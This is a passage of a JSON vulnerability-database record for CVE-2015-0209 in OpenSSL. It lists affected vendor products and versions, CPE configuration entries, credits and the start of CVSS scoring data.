        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.010"
      },
      {
        "model": "informix genero",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.40"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.9"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "junos os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "project openssl 0.9.8o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "alienvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.15"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "project openssl e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1886"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "big-ip ltm hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.2"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.3"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.2.0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "version control agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.5"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "system storage san384b-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.5"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.7"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "big-ip asm hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.212"
      },
      {
        "model": "sametime",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.2.0"
      },
      {
        "model": "big-ip psm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.4"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.01"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "sterling b2b integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "big-ip wom hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8677"
      },
      {
        "model": "ctpos 6.6r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.11"
      },
      {
        "model": "icewall mcrp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "sametime unified telephony",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.2.0"
      },
      {
        "model": "big-ip analytics hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "project openssl 0.9.8s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.2.835"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1.0.841"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.12"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.13"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.2.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1.0.103"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.12"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.12"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4"
      },
      {
        "model": "big-ip wom hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip gtm hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "security network controller 1.0.3376m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.9"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.9"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3379"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "netscaler service delivery appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.2.7"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "big-ip gtm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.0.121"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "big-ip aam",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "big-ip psm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.9"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "project openssl 0.9.8zf",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "session border controller for enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.7.770"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.4"
      },
      {
        "model": "insight orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.10"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.0"
      },
      {
        "model": "flex system fc5022 16gb san scalable switch 7.2.0d5",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "big-ip pem hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "icewall mcrp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.0.1"
      },
      {
        "model": "abyp-2t-0s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip edge gateway hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.7"
      },
      {
        "model": "systems insight manager 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "big-ip apm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "project openssl 1.0.1l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.4.750"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "big-ip edge gateway hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "systems insight manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "i operating system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "project openssl 1.0.0q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "7.0"
      },
      {
        "model": "algo one core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.8"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.10.800"
      },
      {
        "model": "project openssl 0.9.8u",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "ctpos 6.6r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "big-ip psm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cognos controller fp1 if2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "project openssl 1.0.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "icewall sso dfw r1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.9.790"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "73239"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "0.9.8ze",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "BoringSSL project",
    "sources": [
      {
        "db": "BID",
        "id": "73239"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2015-0209",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
